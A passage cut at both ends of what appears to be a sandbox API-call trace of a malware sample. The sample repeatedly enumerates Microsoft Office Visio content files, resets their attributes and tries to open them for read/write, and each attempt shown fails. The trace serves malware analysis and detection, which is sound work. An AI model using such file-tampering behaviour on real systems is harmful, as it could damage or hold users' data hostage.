lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.861] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.861] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.861] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.862] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.862] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\AUDIT_U.VSS", dwFileAttributes=0x80) returned 0 [0137.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\AUDIT_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\audit_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.862] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.862] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.862] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.862] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.862] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\AUDIT_U.VST", dwFileAttributes=0x80) returned 0 [0137.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\AUDIT_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\audit_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.862] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.863] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.863] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.863] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.863] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BASFLO_M.VSS", dwFileAttributes=0x80) returned 0 [0137.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BASFLO_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\basflo_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.863] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.863] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.863] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.863] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.863] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BASFLO_M.VST", dwFileAttributes=0x80) returned 0 [0137.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BASFLO_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\basflo_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.864] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.864] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.864] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.864] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.865] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BASFLO_U.VSS", dwFileAttributes=0x80) returned 0 [0137.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BASFLO_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\basflo_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.865] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.865] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.865] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.865] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.865] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BASFLO_U.VST", dwFileAttributes=0x80) returned 0 [0137.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BASFLO_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\basflo_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.865] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.865] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.865] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.865] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.866] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BASICD_M.VST", dwFileAttributes=0x80) returned 0 [0137.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BASICD_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\basicd_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.866] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.866] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.866] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.866] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.866] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BASICD_U.VST", dwFileAttributes=0x80) returned 0 [0137.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BASICD_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\basicd_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.867] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.867] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.867] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.867] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.867] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BASIC_M.VSS", dwFileAttributes=0x80) returned 0 [0137.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BASIC_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\basic_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.867] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.867] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.868] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.868] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BASIC_U.VSS", dwFileAttributes=0x80) returned 0 [0137.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BASIC_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\basic_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.868] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.868] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.868] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.868] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BCKGRN_M.VSS", dwFileAttributes=0x80) returned 0 [0137.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BCKGRN_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bckgrn_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.869] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.869] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.869] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.869] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.869] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BCKGRN_U.VSS", dwFileAttributes=0x80) returned 0 [0137.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BCKGRN_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bckgrn_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.869] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.869] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.869] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.869] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.869] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLDCOR_M.VSS", dwFileAttributes=0x80) returned 0 [0137.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLDCOR_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bldcor_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.870] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.870] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.870] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.870] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.870] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLDCOR_U.VSS", dwFileAttributes=0x80) returned 0 [0137.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLDCOR_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bldcor_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.871] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.871] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.871] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.872] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.872] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLDGPLAN.DWG", dwFileAttributes=0x80) returned 0 [0137.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLDGPLAN.DWG" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bldgplan.dwg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.872] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.872] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.872] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.872] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.873] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLDGPLAN.JPG", dwFileAttributes=0x80) returned 0 [0137.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLDGPLAN.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bldgplan.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.873] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.873] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.873] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.873] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.873] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.873] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.873] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCK3_M.VSS", dwFileAttributes=0x80) returned 0 [0137.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCK3_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\block3_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.874] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.874] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.874] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.874] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.874] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCK3_U.VSS", dwFileAttributes=0x80) returned 0 [0137.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCK3_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\block3_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.874] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.874] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.875] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.875] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.875] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCKP_M.VSS", dwFileAttributes=0x80) returned 0 [0137.875] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCKP_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\blockp_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.875] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.875] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.875] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.875] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.875] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCKP_M.VST", dwFileAttributes=0x80) returned 0 [0137.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCKP_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\blockp_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.876] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.876] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.876] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.876] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.876] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCKP_U.VSS", dwFileAttributes=0x80) returned 0 [0137.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCKP_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\blockp_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.877] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.877] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.877] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.877] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.877] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCKP_U.VST", dwFileAttributes=0x80) returned 0 [0137.877] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCKP_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\blockp_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.877] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.877] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.877] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.877] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.877] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCKS.DWG", dwFileAttributes=0x80) returned 0 [0137.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCKS.DWG" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\blocks.dwg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.878] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.878] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.878] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.878] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.878] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCK_M.VSS", dwFileAttributes=0x80) returned 0 [0137.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCK_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\block_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.879] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.879] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.879] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.879] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.879] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCK_M.VST", dwFileAttributes=0x80) returned 0 [0137.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCK_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\block_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.879] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.879] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.879] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.879] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.880] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCK_U.VSS", dwFileAttributes=0x80) returned 0 [0137.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCK_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\block_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.880] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.880] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.880] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.880] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.880] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCK_U.VST", dwFileAttributes=0x80) returned 0 [0137.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCK_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\block_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.880] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.880] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.880] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.881] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.881] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BORDRS_M.VSS", dwFileAttributes=0x80) returned 0 [0137.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BORDRS_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bordrs_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.881] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.881] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.882] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.882] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.882] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BORDRS_U.VSS", dwFileAttributes=0x80) returned 0 [0137.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BORDRS_U.VSS" 